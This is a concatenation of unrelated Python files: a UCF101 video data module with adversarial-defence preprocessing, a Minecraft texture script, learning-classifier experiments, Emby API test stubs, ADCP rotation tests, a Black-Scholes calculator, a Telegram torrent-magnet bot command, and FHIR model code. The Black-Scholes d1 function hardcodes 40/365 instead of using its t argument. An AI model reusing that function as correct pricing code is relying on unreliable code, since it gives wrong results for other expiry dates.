from oscar.defences.preprocessor.multichannel_semantic_segmentor import MultichannelSemanticSegmentorPyTorch
dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir)
robust_extractor = MultichannelSemanticSegmentorPyTorch(detectron2=dt2, nb_channels=len(self.palette))
train_channels_mean = 127.5
test_channels_mean = 127.5
elif 'RGBSegSC_' in self.modality or 'RGBKeySC_' in self.modality:
# TODO: Create another segmentor class that is faster and selects objects relevant to UCF101
from oscar.defences.preprocessor.detectron2 import CachedDetectron2Preprocessor
from oscar.defences.preprocessor.multichannel_semantic_segmentor import MultichannelSemanticSegmentorPyTorch
dt2 = CachedDetectron2Preprocessor(self.frame_cache_dir)
robust_extractor = MultichannelSemanticSegmentorPyTorch(detectron2=dt2, nb_channels=1) # 1 channel == person mask
train_channels_mean = 127.5
test_channels_mean = 127.5
# Apply robust feature extractor to RGB channels only if not _FlowMasked
if robust_extractor is not None and '_FlowMasked' not in self.modality:
robust_extractor = ExSplitLambda(robust_extractor, 3, 0, dim=-1)
robust_transform = ExCompose([
T.Normalize(0, 255), # [0, 255] -> [0, 1]
Permute(0, 2, 3, 1), # TCHW -> THWC
Unsqueeze(0), # THWC -> NTHWC
robust_extractor, # Apply robust feature extractor
Squeeze(0), # NTHWC -> THWC
Permute(0, 3, 1, 2), # THWC -> TCHW
T.Normalize(0, 1/255), # [0, 1] -> [0, 255]
])
# Train transform
# FIXME: Don't load flow when modality does not specify _Flow!
# FIXME: Is there a way to decouple rgb and flow datasets like we did above?
# The problem is they need to be synchronized somehow.
train_transform = ExCompose([
robust_transform,
T.RandomResizedCrop(self.frame_size, scale=self.random_resized_crop_scale, ratio=(1., 1.)), # Crop then Resize
T.RandomApply([TF.hflip, ExSplitLambda(T.Normalize(255, -1), 1, -2, dim=-1)]), # Horizontal flip and invert x-flow randomly
T.Normalize(train_channels_mean, 1), # [0, 255] -> ~[-128, 128]
Permute(1, 0, 2, 3), # TCHW -> CTHW
])
train_sampler = ClipSampler(self.clip_length, self.clip_step)
# Test transform
test_transform = ExCompose([
robust_transform,
T.Resize(self.frame_size),
T.CenterCrop(self.frame_size),
T.Normalize(test_channels_mean, 1), # [0, 255] -> ~[-128, 128]
Permute(1, 0, 2, 3), # TCHW -> CTHW
])
test_sampler = range
if self.mid_clip_only:
test_sampler = MiddleClipSampler(self.clip_length, self.clip_step)
if stage == 'fit' or stage is None:
logger.info("Loading training data...")
self.train_dataset = UCF101Dataset(self.frames_root,
self.annotation_dir,
self.train_file_patterns,
train=True,
fold=self.fold,
transform=train_transform,
sampler=train_sampler)
logger.info("train data = %d", len(self.train_dataset))
logger.info("Loading validation data...")
self.val_dataset = UCF101Dataset(self.frames_root,
self.annotation_dir,
self.test_file_patterns,
train=False,
fold=self.fold,
transform=test_transform,
sampler=train_sampler)
logger.info("val data = %d", len(self.val_dataset))
if stage == 'test' or stage is None:
logger.info("Loading test data...")
test_dataset = UCF101Dataset(self.frames_root,
self.annotation_dir,
self.test_file_patterns,
train=False,
fold=self.fold,
transform=test_transform,
sampler=test_sampler)
# Select test indices...
if self.test_indices is not None:
logger.info("Selecting data indices: %s", self.test_indices)
test_dataset = torch.utils.data.Subset(test_dataset, self.test_indices)
# ...or subsample test_dataset using a stratified split of test_size elements.
elif self.test_size > 0:
y = test_dataset.targets
if test_dataset.target_transform is not None:
y_transform = [test_dataset.target_transform(y_) for y_ in y]
sss = StratifiedShuffleSplit(n_splits=1, test_size=self.test_size, random_state=self.random_seed)
_, indices = next(sss.split(y, y_transform))
y_selected = [y[i] for i in indices]
logger.info("Stratified subsampling test dataset to %d samples: %s", self.test_size, Counter(y_selected))
test_dataset = torch.utils.data.Subset(test_dataset, indices)
self.test_dataset = test_dataset
logger.info("test data = %d", len(self.test_dataset))
def train_dataloader(self):
return DataLoader(self.train_dataset,
batch_size=self.batch_size,
shuffle=True,
num_workers=self.num_workers,
pin_memory=True,
drop_last=True,
collate_fn=self.collate_fn)
def val_dataloader(self):
return DataLoader(self.val_dataset,
batch_size=self.batch_size,
shuffle=False,
num_workers=self.num_workers,
pin_memory=True,
drop_last=True,
collate_fn=self.collate_fn)
def test_dataloader(self):
return DataLoader(self.test_dataset,
batch_size=1, # Must be 1 because we can't batch whole videos
shuffle=False,
num_workers=self.num_workers,
pin_memory=True,
drop_last=False,
collate_fn=self.collate_fn)
| 12,879 | 3,931 |
#!/usr/bin/env python3
# Generate the animations and images needed to provide the "changes" texture pack.
__author__ = 'arnold'
import os
import random
import json
import collections
from PIL import Image
import clip
weeks_in_year = 52
timings = collections.OrderedDict()
timings['autumn'] = 2
timings['winter'] = 8
timings['spring'] = 2
day = 24000
debug_timing = False
if debug_timing:
weeks_in_year = 8
timings['winter'] = 2
day = 2
week = day * 7
transition = week / 2
timings['summer'] = weeks_in_year - sum(timings[x] for x in timings)
year = weeks_in_year * week
if debug_timing:
transition = 70
frames = []
animation = {'frametime': transition}
wrapper = {'animation': animation}
index = 0
for season in timings:
duration = timings[season]
stay_time = duration * week - transition
if debug_timing:
stay_time = week
frame_json = {'index': index, 'time': stay_time}
frames.append(frame_json)
frames.append(index)
index += 1
# Set the seed to prevent the mcmeta changing each time this is run. Otherwise we end up checking a new file each time
# we run the script.
random.seed(13)
os.chdir(clip.directory('top', 'changes.repack', 'override', 'assets', 'minecraft', 'textures', 'block'))
transparent = (0, 0, 0, 0)
for tree in ('oak', 'birch', 'jungle', 'big_oak', 'acacia'):
leaves_img = None
branches_img = None
h = 0
index = 0
adjust_start = random.randrange(0, day)
adjust_end = day - adjust_start
adjusted_frames = frames[:]
if adjust_start:
adjusted_frames.insert(0, {'index': 0, 'time': adjust_start})
if adjust_end:
adjusted_frames.insert(len(adjusted_frames) - 1, {'index': len(timings) - 1, 'time': adjust_end})
animation['frames'] = adjusted_frames
for season in timings:
season_img = Image.open('%s/leaves_%s.png' % (season, tree))
if not leaves_img:
w, h = season_img.size
leaves_img = Image.new(season_img.mode, (w, 4 * h), transparent)
branches_img = Image.new(season_img.mode, (w, 4 * h), transparent)
frame_pos = h * index
if season == 'winter':
branches_img.paste(season_img, (0, frame_pos))
else:
leaves_img.paste(season_img, (0, frame_pos))
index += 1
animation['interpolate'] = True
with open('leaves_%s.png.mcmeta' % tree, 'w') as f:
json.dump(wrapper, f, indent=2)
animation['interpolate'] = False
with open('branches_%s.png.mcmeta' % tree, 'w') as f:
json.dump(wrapper, f, indent=2)
leaves_img.save('leaves_%s.png' % tree, optimize=True)
branches_img.save('branches_%s.png' % tree, optimize=True)
| 2,704 | 939 |
"""Trains a Bayesian LCS with a GA on the Waterhouse (1996) test function.
"""
import sys
from numpy import double, array, ones, empty, arange, empty, hstack, \
sqrt, exp, sort, sum, inf, power, dot, linspace, sin, pi
from numpy.random import random, randn, binomial, uniform, normal
import Gnuplot
from ga import GeneticAlgorithm_TS
from cls import RBF1DClStore, RBF1DIndv, \
SoftIntervalClStore, SoftInterval1DIndv
from mcmc import SampleModelPosterior
from experiments import read_data, write_data, write_raw_data, plot_cls, \
GA_experiment, MCMC_experiment
waterhouse_data_file = "exp2_waterhouse.data"
waterhouse_data_raw_file = "exp2_waterhouse_raw.data"
waterhouse_data_points = 200
own_data_file = "exp2_own.data"
own_data_raw_file = "exp2_own_raw.data"
own_data_points = 300
noise_data_file = "exp2_noise.data"
noise_data_raw_file = "exp2_noise_raw.data"
noise_data_points = 200
sinus_data_file = "exp2_sinus.data"
sinus_data_raw_file = "exp2_sinus_raw.data"
sinus_data_points = 300
def write_waterhouse_data():
"""Generates the data set and writes it to the data_file.
"""
# generate the data x, y
#var = 0.44
var = 0.20
#var = 0.05
x = sort(random(waterhouse_data_points) * 4.0)
y = 4.26 * (exp(-x) - 4 * exp(-2 * x) + 3 * exp(-3 * x)) \
+ sqrt(var) * randn(waterhouse_data_points)
# write the data
write_data(x, y, waterhouse_data_file)
def write_waterhouse_raw_data():
"""Writes the raw data without noise.
"""
x = linspace(0, 4, 1000)
y = 4.26 * (exp(-x) - 4 * exp(-2 * x) + 3 * exp(-3 * x))
write_data(x, y, waterhouse_data_raw_file)
def read_waterhouse_data():
return read_data(waterhouse_data_file)
def own_f(x):
"""Returns f(x) for given x.
"""
# functions are
# f1(x) = 0.05 + 0.5 x
# f2(x) = 2 - 4 x
# f3(x) = -1.5 + 2.5 x
fns = array([[0.05, 0.5], [2.0, -4.0], [-1.5, 2.5]], double)
# gaussian basis functions are given by (mu, var, weight):
# (0.2, 0.05), (0.5, 0.01), (0.8, 0.05)
gbfs = array([[0.2, 0.05, 0.5], [0.5, 0.01, 1.0], [0.8, 0.05, 0.4]], double)
# plain function values
fx = fns[:,0] + x * fns[:,1]
#print "%f\t%f\t%f\t%f" % (x, fx[0], fx[1], fx[2])
# mixing weights
mx = gbfs[:,2] * exp(-0.5 / gbfs[:,1] * power(x - gbfs[:,0], 2.0))
mx /= sum(mx)
#print "%f\t%f\t%f\t%f" % (x, mx[0], mx[1], mx[2])
# return mixed function
return dot(fx, mx)
def write_own_data():
"""Generates 'artificial' dataset and writes it to file.
"""
noise = 0.1
x = uniform(size = own_data_points)
y = array([own_f(x_n) for x_n in x], double) + \
normal(size = own_data_points) * noise
write_data(x, y, own_data_file)
def write_own_raw_data():
"""Writes raw classifier and function to file.
"""
x = linspace(0, 1.0, 1000)
y = array([own_f(x_n) for x_n in x], double)
W = array([[0.05, 0.5], [2.0, -4.0], [-1.5, 2.5]], double)
X = hstack((ones(len(x), double).reshape(len(x), 1),
x.reshape(len(x), 1)))
Y = dot(X, W.T)
write_raw_data(x, hstack([y.reshape(len(x), 1), Y]), own_data_raw_file)
def read_own_data():
return read_data(own_data_file)
def noise_f(x):
"""function with different noise levels.
"""
if x > 0:
return -1.0 + 2.0 * x
else:
return -1.0 - 2.0 * x
def write_noise_data():
"""Generates function with different leven of noise in different
areas of the function.
"""
l_noise, u_noise = 0.6, 0.1
x = uniform(-1.0, 1.0, size = noise_data_points)
y = array([noise_f(xn) + \
(normal(0.0, l_noise) if xn < 0 else normal(0.0, u_noise)) \
for xn in x], double)
write_data(x, y, noise_data_file)
def write_noise_raw_data():
"""Writes the basic function.
"""
x = linspace(-1, 1, 1000)
y = array([noise_f(x_n) for x_n in x], double)
write_data(x, y, noise_data_raw_file)
def read_noise_data():
return read_data(noise_data_file)
def write_sinus_data():
"""Generates sinusoid data with some noise.
"""
x = uniform(-1.0, 1.0, size = sinus_data_points)
y = sin(2 * pi * x) + normal(0.0, 0.15, size = sinus_data_points)
write_data(x, y, sinus_data_file)
def write_sinus_raw_data():
"""Generate sinusoid data without noise.
"""
x = linspace(-1.0, 1.0, 1000)
y = sin(2 * pi * x)
write_data(x, y, sinus_data_raw_file)
def read_sinus_data():
return read_data(sinus_data_file)
def exp2a():
"""Running GA on waterhouse data.
"""
X, Y = read_waterhouse_data()
N = X.shape[0]
Xf = ones(N, double).reshape(N, 1)
cl_store = RBF1DClStore(0.0, 4.0)
# run experiment with over 100 epochs with 20 individuals in the pop.
GA_experiment(X, Y, Xf, 250,
[1 + binomial(4, 0.5) for p in xrange(20)],
cl_store, RBF1DIndv,
'exp2a_fitness.data', 'exp2a_cls.data')
def exp2b():
"""Running MCMC on waterhouse data.
"""
X, Y = read_waterhouse_data()
N = X.shape[0]
Xf = ones(N, double).reshape(N, 1)
cl_store = RBF1DClStore(0.0, 4.0)
MCMC_experiment(X, Y, Xf, 500, 10, 0.25,
1 + binomial(4, 0.5),
cl_store,
'exp2b_varbound.data', 'exp2b_cls.data')
def exp2c():
"""Running GA on own data.
"""
X, Y = read_own_data()
N = X.shape[0]
Xf = ones(N, double).reshape(N, 1)
cl_store = RBF1DClStore(0.0, 1.0)
# run experiment with over 100 epochs with 20 individuals in the pop.
GA_experiment(X, Y, Xf, 250,
[1 + binomial(8, 0.5) for p in xrange(20)],
cl_store, RBF1DIndv,
'exp2c_fitness.data', 'exp2c_cls.data')
def exp2d():
"""Running MCMC on own data.
"""
X, Y = read_own_data()
N = X.shape[0]
Xf = ones(N, double).reshape(N, 1)
cl_store = RBF1DClStore(0.0, 1.0)
MCMC_experiment(X, Y, Xf, 500, 10, 0.25,
1 + binomial(8, 0.5),
cl_store,
'exp2d_varbound.data', 'exp2d_cls.data')
def exp2e():
"""Running GA on noisy data, using soft interval classifiers.
"""
X, Y = read_noise_data()
N = X.shape[0]
Xf = ones(N, double).reshape(N, 1)
cl_store = SoftIntervalClStore(-1.0, 1.0)
# run experiment with over 100 epochs with 20 individuals in the pop.
GA_experiment(X, Y, Xf, 250,
[1 + binomial(8, 0.5) for p in xrange(20)],
cl_store, SoftInterval1DIndv,
'exp2e_fitness.data', 'exp2e_cls.data')
def exp2f():
"""Running MCMC on noisy data, using soft interval classifiers.
"""
X, Y = read_noise_data()
N = X.shape[0]
Xf = ones(N, double).reshape(N, 1)
cl_store = SoftIntervalClStore(-1.0, 1.0)
MCMC_experiment(X, Y, Xf, 500, 10, 0.25,
1 + binomial(8, 0.5),
cl_store,
'exp2f_varbound.data', 'exp2f_cls.data')
def exp2g():
"""Running GA on sinusoid data, using soft interval classifiers.
"""
X, Y = read_sinus_data()
N = X.shape[0]
Xf = ones(N, double).reshape(N, 1)
cl_store = SoftIntervalClStore(-1.0, 1.0)
# run experiment with over 100 epochs with 20 individuals in the pop.
GA_experiment(X, Y, Xf, 250,
[1 + binomial(8, 0.5) for p in xrange(20)],
cl_store, SoftInterval1DIndv,
'exp2g_fitness.data', 'exp2g_cls.data')
def exp2h():
"""Running MCMC on sinusoid data, using soft interval classifiers.
"""
X, Y = read_sinus_data()
N = X.shape[0]
Xf = ones(N, double).reshape(N, 1)
cl_store = SoftIntervalClStore(-1.0, 1.0)
MCMC_experiment(X, Y, Xf, 500, 10, 0.25,
1 + binomial(8, 0.5),
cl_store,
'exp2h_varbound.data', 'exp2h_cls.data')
# run experiments from arguments
if __name__ == '__main__':
exp_modes = {'gen1': lambda: write_waterhouse_data(),
'gen2': lambda: write_own_data(),
'gen3': lambda: write_noise_data(),
'gen4': lambda: write_sinus_data(),
'raw1': lambda: write_waterhouse_raw_data(),
'raw2': lambda: write_own_raw_data(),
'raw3': lambda: write_noise_raw_data(),
'raw4': lambda: write_sinus_raw_data(),
'a': lambda: exp2a(),
'b': lambda: exp2b(),
'c': lambda: exp2c(),
'd': lambda: exp2d(),
'e': lambda: exp2e(),
'f': lambda: exp2f(),
'g': lambda: exp2g(),
'h': lambda: exp2h()}
for argv in sys.argv[1:]:
if not exp_modes.has_key(argv):
print "--- Unkown experiment: %s" % argv
else:
print "--- Running '%s'" % argv
exp_modes[argv]()
| 8,929 | 3,669 |
# coding: utf-8
"""
Emby Server API
Explore the Emby Server API # noqa: E501
OpenAPI spec version: 4.1.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import embyapi
from embyapi.api.live_tv_service_api import LiveTvServiceApi # noqa: E501
from embyapi.rest import ApiException
class TestLiveTvServiceApi(unittest.TestCase):
"""LiveTvServiceApi unit test stubs"""
def setUp(self):
self.api = LiveTvServiceApi() # noqa: E501
def tearDown(self):
pass
def test_delete_livetv_channelmappingoptions(self):
"""Test case for delete_livetv_channelmappingoptions
"""
pass
def test_delete_livetv_channelmappings(self):
"""Test case for delete_livetv_channelmappings
"""
pass
def test_delete_livetv_listingproviders(self):
"""Test case for delete_livetv_listingproviders
Deletes a listing provider # noqa: E501
"""
pass
def test_delete_livetv_recordings_by_id(self):
"""Test case for delete_livetv_recordings_by_id
Deletes a live tv recording # noqa: E501
"""
pass
def test_delete_livetv_seriestimers_by_id(self):
"""Test case for delete_livetv_seriestimers_by_id
Cancels a live tv series timer # noqa: E501
"""
pass
def test_delete_livetv_timers_by_id(self):
"""Test case for delete_livetv_timers_by_id
Cancels a live tv timer # noqa: E501
"""
pass
def test_delete_livetv_tunerhosts(self):
"""Test case for delete_livetv_tunerhosts
Deletes a tuner host # noqa: E501
"""
pass
def test_get_livetv_channelmappingoptions(self):
"""Test case for get_livetv_channelmappingoptions
"""
pass
def test_get_livetv_channelmappings(self):
"""Test case for get_livetv_channelmappings
"""
pass
def test_get_livetv_channels(self):
"""Test case for get_livetv_channels
Gets available live tv channels. # noqa: E501
"""
pass
def test_get_livetv_channels_by_id(self):
"""Test case for get_livetv_channels_by_id
Gets a live tv channel # noqa: E501
"""
pass
def test_get_livetv_guideinfo(self):
"""Test case for get_livetv_guideinfo
Gets guide info # noqa: E501
"""
pass
def test_get_livetv_info(self):
"""Test case for get_livetv_info
Gets available live tv services. # noqa: E501
"""
pass
def test_get_livetv_listingproviders(self):
"""Test case for get_livetv_listingproviders
Gets current listing providers # noqa: E501
"""
pass
def test_get_livetv_listingproviders_available(self):
"""Test case for get_livetv_listingproviders_available
Gets listing provider # noqa: E501
"""
pass
def test_get_livetv_listingproviders_default(self):
"""Test case for get_livetv_listingproviders_default
"""
pass
def test_get_livetv_listingproviders_lineups(self):
"""Test case for get_livetv_listingproviders_lineups
Gets available lineups # noqa: E501
"""
pass
def test_get_livetv_listingproviders_schedulesdirect_countries(self):
"""Test case for get_livetv_listingproviders_schedulesdirect_countries
Gets available lineups # noqa: E501
"""
pass
def test_get_livetv_liverecordings_by_id_stream(self):
"""Test case for get_livetv_liverecordings_by_id_stream
Gets a live tv channel # noqa: E501
"""
pass
def test_get_livetv_livestreamfiles_by_id_by_container(self):
"""Test case for get_livetv_livestreamfiles_by_id_by_container
Gets a live tv channel # noqa: E501
"""
pass
def test_get_livetv_programs(self):
"""Test case for get_livetv_programs
Gets available live tv epgs.. # noqa: E501
"""
pass
def test_get_livetv_programs_recommended(self):
"""Test case for get_livetv_programs_recommended
Gets available live tv epgs.. # noqa: E501
"""
pass
def test_get_livetv_recordings(self):
"""Test case for get_livetv_recordings
Gets live tv recordings # noqa: E501
"""
pass
def test_get_livetv_recordings_by_id(self):
"""Test case for get_livetv_recordings_by_id
Gets a live tv recording # noqa: E501
"""
pass
def test_get_livetv_recordings_folders(self):
"""Test case for get_livetv_recordings_folders
Gets recording folders # noqa: E501
"""
pass
def test_get_livetv_recordings_groups(self):
"""Test case for get_livetv_recordings_groups
Gets live tv recording groups # noqa: E501
"""
pass
def test_get_livetv_recordings_groups_by_id(self):
"""Test case for get_livetv_recordings_groups_by_id
Gets a recording group # noqa: E501
"""
pass
def test_get_livetv_recordings_series(self):
"""Test case for get_livetv_recordings_series
Gets live tv recordings # noqa: E501
"""
pass
def test_get_livetv_seriestimers(self):
"""Test case for get_livetv_seriestimers
Gets live tv series timers # noqa: E501
"""
pass
def test_get_livetv_seriestimers_by_id(self):
"""Test case for get_livetv_seriestimers_by_id
Gets a live tv series timer # noqa: E501
"""
pass
def test_get_livetv_timers(self):
"""Test case for get_livetv_timers
Gets live tv timers # noqa: E501
"""
pass
def test_get_livetv_timers_by_id(self):
"""Test case for get_livetv_timers_by_id
Gets a live tv timer # noqa: E501
"""
pass
def test_get_livetv_timers_defaults(self):
"""Test case for get_livetv_timers_defaults
Gets default values for a new timer # noqa: E501
"""
pass
def test_get_livetv_tunerhosts(self):
"""Test case for get_livetv_tunerhosts
Gets tuner hosts # noqa: E501
"""
pass
def test_get_livetv_tunerhosts_types(self):
"""Test case for get_livetv_tunerhosts_types
"""
pass
def test_get_livetv_tuners_discvover(self):
"""Test case for get_livetv_tuners_discvover
"""
pass
def test_head_livetv_channelmappingoptions(self):
"""Test case for head_livetv_channelmappingoptions
"""
pass
def test_head_livetv_channelmappings(self):
"""Test case for head_livetv_channelmappings
"""
pass
def test_options_livetv_channelmappingoptions(self):
"""Test case for options_livetv_channelmappingoptions
"""
pass
def test_options_livetv_channelmappings(self):
"""Test case for options_livetv_channelmappings
"""
pass
def test_patch_livetv_channelmappingoptions(self):
"""Test case for patch_livetv_channelmappingoptions
"""
pass
def test_patch_livetv_channelmappings(self):
"""Test case for patch_livetv_channelmappings
"""
pass
def test_post_livetv_channelmappingoptions(self):
"""Test case for post_livetv_channelmappingoptions
"""
pass
def test_post_livetv_channelmappings(self):
"""Test case for post_livetv_channelmappings
"""
pass
def test_post_livetv_listingproviders(self):
"""Test case for post_livetv_listingproviders
Adds a listing provider # noqa: E501
"""
pass
def test_post_livetv_programs(self):
"""Test case for post_livetv_programs
Gets available live tv epgs.. # noqa: E501
"""
pass
def test_post_livetv_seriestimers(self):
"""Test case for post_livetv_seriestimers
Creates a live tv series timer # noqa: E501
"""
pass
def test_post_livetv_seriestimers_by_id(self):
"""Test case for post_livetv_seriestimers_by_id
Updates a live tv series timer # noqa: E501
"""
pass
def test_post_livetv_timers(self):
"""Test case for post_livetv_timers
Creates a live tv timer # noqa: E501
"""
pass
def test_post_livetv_timers_by_id(self):
"""Test case for post_livetv_timers_by_id
Updates a live tv timer # noqa: E501
"""
pass
def test_post_livetv_tunerhosts(self):
"""Test case for post_livetv_tunerhosts
Adds a tuner host # noqa: E501
"""
pass
def test_post_livetv_tuners_by_id_reset(self):
"""Test case for post_livetv_tuners_by_id_reset
Resets a tv tuner # noqa: E501
"""
pass
def test_put_livetv_channelmappingoptions(self):
"""Test case for put_livetv_channelmappingoptions
"""
pass
def test_put_livetv_channelmappings(self):
"""Test case for put_livetv_channelmappings
"""
pass
if __name__ == '__main__':
unittest.main()
| 9,439 | 3,224 |
from dolfyn.tests import test_read_adp as tr
from dolfyn.tests import base
from dolfyn.rotate.api import rotate2
from numpy.testing import assert_allclose
import numpy as np
import scipy.io as sio
"""
Testing against velocity and bottom-track velocity data in Nortek mat files
exported from SignatureDeployment.
inst2earth rotation fails for AHRS-equipped istruments and I don't know why -
I believe it's due to an RC filter (or some such) on Nortek's side after they
load in the orientation matrix from the AHRS (Check out the difference
colorplots compared to non-AHRS instruments.) Using HPR- or quaterion-calc'd
orientation matrices doesn't close the gap.
"""
def load_nortek_matfile(filename):
# remember to transpose this data
data = sio.loadmat(filename,
struct_as_record=False,
squeeze_me=True)
d = data['Data']
# print(d._fieldnames)
burst = 'Burst'
bt = 'BottomTrack'
beam = ['_VelBeam1', '_VelBeam2', '_VelBeam3', '_VelBeam4']
b5 = 'IBurst_VelBeam5'
inst = ['_VelX', '_VelY', '_VelZ1', '_VelZ2']
earth = ['_VelEast', '_VelNorth', '_VelUp1', '_VelUp2']
axis = {'beam': beam, 'inst': inst, 'earth': earth}
AHRS = 'Burst_AHRSRotationMatrix' # , 'IBurst_AHRSRotationMatrix']
vel = {'beam': {}, 'inst': {}, 'earth': {}}
for ky in vel.keys():
for i in range(len(axis[ky])):
vel[ky][i] = np.transpose(getattr(d, burst+axis[ky][i]))
vel[ky] = np.stack((vel[ky][0], vel[ky][1],
vel[ky][2], vel[ky][3]), axis=0)
if AHRS in d._fieldnames:
vel['omat'] = np.transpose(getattr(d, AHRS))
if b5 in d._fieldnames:
vel['b5'] = np.transpose(getattr(d, b5))
#vel['omat5'] = getattr(d, AHRS[1])
if bt+beam[0] in d._fieldnames:
vel_bt = {'beam': {}, 'inst': {}, 'earth': {}}
for ky in vel_bt.keys():
for i in range(len(axis[ky])):
vel_bt[ky][i] = np.transpose(getattr(d, bt+axis[ky][i]))
vel_bt[ky] = np.stack((vel_bt[ky][0], vel_bt[ky][1],
vel_bt[ky][2], vel_bt[ky][3]), axis=0)
return vel, vel_bt
else:
return vel
def rotate(axis):
# BenchFile01.ad2cp
td_sig = rotate2(tr.dat_sig, axis, inplace=False)
# Sig1000_IMU.ad2cp no userdata
td_sig_i = rotate2(tr.dat_sig_i, axis, inplace=False)
# VelEchoBT01.ad2cp
td_sig_ieb = rotate2(tr.dat_sig_ieb, axis,
inplace=False)
# Sig500_Echo.ad2cp
td_sig_ie = rotate2(tr.dat_sig_ie, axis,
inplace=False)
td_sig_vel = load_nortek_matfile(base.rfnm('BenchFile01.mat'))
td_sig_i_vel = load_nortek_matfile(base.rfnm('Sig1000_IMU.mat'))
td_sig_ieb_vel, vel_bt = load_nortek_matfile(base.rfnm('VelEchoBT01.mat'))
td_sig_ie_vel = load_nortek_matfile(base.rfnm('Sig500_Echo.mat'))
nens = 100
# ARHS inst2earth orientation matrix check
# Checks the 1,1 element because the nortek orientmat's shape is [9,:] as
# opposed to [3,3,:]
if axis == 'inst':
assert_allclose(td_sig_i.orientmat[0][0].values,
td_sig_i_vel['omat'][0, :nens], atol=1e-7)
assert_allclose(td_sig_ieb.orientmat[0][0].values,
td_sig_ieb_vel['omat'][0, :][..., :nens], atol=1e-7)
# 4-beam velocity
assert_allclose(td_sig.vel.values, td_sig_vel[axis][..., :nens], atol=1e-5)
assert_allclose(td_sig_i.vel.values,
td_sig_i_vel[axis][..., :nens], atol=5e-3)
assert_allclose(td_sig_ieb.vel.values,
td_sig_ieb_vel[axis][..., :nens], atol=5e-3)
assert_allclose(td_sig_ie.vel.values,
td_sig_ie_vel[axis][..., :nens], atol=1e-5)
# 5th-beam velocity
if axis == 'beam':
assert_allclose(td_sig_i.vel_b5.values,
td_sig_i_vel['b5'][..., :nens], atol=1e-5)
assert_allclose(td_sig_ieb.vel_b5.values,
td_sig_ieb_vel['b5'][..., :nens], atol=1e-5)
assert_allclose(td_sig_ie.vel_b5.values,
td_sig_ie_vel['b5'][..., :nens], atol=1e-5)
# bottom-track
assert_allclose(td_sig_ieb.vel_bt.values,
vel_bt[axis][..., :nens], atol=5e-3)
def test_rotate2_beam():
rotate('beam')
def test_rotate2_inst():
rotate('inst')
def test_rotate2_earth():
rotate('earth')
| 4,454 | 1,747 |
a = r'
(?x)
foo
'
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
r : source.python, storage.type.string.python, string.regexp.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python
: invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python
: source.python
( : punctuation.parenthesis.begin.python, source.python
? : invalid.illegal.operator.python, source.python
x : source.python
) : punctuation.parenthesis.end.python, source.python
: source.python
foo : source.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.docstring.single.python
: invalid.illegal.newline.python, source.python, string.quoted.docstring.single.python
| 1,022 | 279 |
import math
def get_d1(p0, X, t, sigma, Rho):
# P0 stock price 62
# X exercise Price 60
# t time to expiration days/365 40
# sigma Volatility 0.32
# Rho Risk-Free Rate 0.04
# d1 = {ln(62/60) + [0.04 + 0.5 * 0.32 ^ 2] * (40/365)} / 0.32 * sqrt(40/365)
a = math.log(p0/X) + (Rho + 0.5 * sigma * sigma) * (t / 365)
b = sigma * math.sqrt(40/365)
return a/b
def get_d2(d1, sigma, t):
# d1 - sigma * sqrt(t/365)
return d1 - sigma * math.sqrt(t/365)
def get_cumulative_standard_normal_distribution(d):
return 0.5 * (1 + math.erf(d/math.sqrt(2)))
def get_call(p0, Nd1, X, Krf, t, Nd2):
a = p0 * Nd1
b = X / (math.pow(math.e, Krf * t/365))
return a - b * Nd2
def get_put(Vc, X, Krf, t, p0):
return Vc + X / math.pow(math.e, Krf * t/365) - p0
if __name__ == "__main__":
# Z = (x - µ) / sigma
p0 = 62
X = 60
t = 40
sigma = 0.32
Rho = 0.04
d1 = get_d1(p0, X, t, sigma, Rho)
d2 = get_d2(d1, sigma, t)
Nd1 = get_cumulative_standard_normal_distribution(d1)
Nd2 = get_cumulative_standard_normal_distribution(d2)
Vc = get_call(p0, Nd1, X, Rho, t, Nd2)
Vp = get_put(Vc, X, Rho, t, p0)
print("d1:", d1)
print("d2:", d2)
print("Nd1:", Nd1)
print("Nd2:", Nd2)
print("Vc:", Vc)
print("Vp:", Vp) | 1,331 | 701 |
from .get_response import nyaa_id, sukebei_id
from bot import NYAA, botname
from pyrogram import Client, filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery
INVALID_TEXT = """
No ID found!
"""
@NYAA.on_message(filters.command(["magnet", f"magnet@{botname}"], prefixes = "/") & ~filters.edited)
async def get_magnet(client, message):
query = message.text.split(maxsplit = 2)
if len(query) < 2 or len(query) > 2:
await NYAA.send_message(chat_id = message.chat.id, text = INVALID_TEXT)
return
buttons = [
[
InlineKeyboardButton("Nyaa", f"nyaa {query[-1]}"),
InlineKeyboardButton("Sukebei", f"sukebei {query[-1]}")
]
]
await NYAA.send_message(chat_id = message.chat.id, text = "Where do you wanna search?", reply_markup = InlineKeyboardMarkup(buttons)) | 932 | 319 |
"""App API serializers.
"""
import logging
from rest_framework import serializers
from ..models import Image
logger = logging.getLogger(__name__)
class ImageSerializer(serializers.ModelSerializer):
"""ImageSerializer."""
class Meta:
model = Image
fields = "__all__"
| 297 | 83 |
# -*- coding: utf-8 -*-
"""
Profile: https://www.hl7.org/fhir/DSTU2/implementationguide.html
Release: DSTU2
Version: 1.0.2
Revision: 7202
"""
from typing import Any, Dict
from typing import List as ListType
from pydantic import Field, root_validator
from . import backboneelement, domainresource, fhirtypes
class ImplementationGuide(domainresource.DomainResource):
"""A set of rules about how FHIR is used.
A set of rules of how a particular interoperability or standards problem is
solved - typically through the use of FHIR resources. This resource is used
to gather all the parts of an implementation guide into a logical whole and
to publish a computable definition of all the parts.
"""
resource_type = Field("ImplementationGuide", const=True)
binary: ListType[fhirtypes.Uri] = Field(
None,
alias="binary",
title="List of `uri` items.",
description="Image, css, script, etc..",
)
contact: ListType[fhirtypes.ImplementationGuideContactType] = Field(
None,
alias="contact",
title="Contact details for the publisher",
description=(
"Contact details to assist a user in finding and communicating with the"
" publisher."
),
)
copyright: fhirtypes.String = Field(
None,
alias="copyright",
title="Use and/or publishing restrictions",
description=(
"A copyright statement relating to the implementation guide and/or its "
"contents. Copyright statements are generally legal restrictions on the"
" use and publishing of the implementation guide."
),
)
date: fhirtypes.DateTime = Field(
None,
alias="date",
title="Date last changed",
description=(
"The date (and optionally time) when the implementation guide was "
"published. The date must change when the business version changes and "
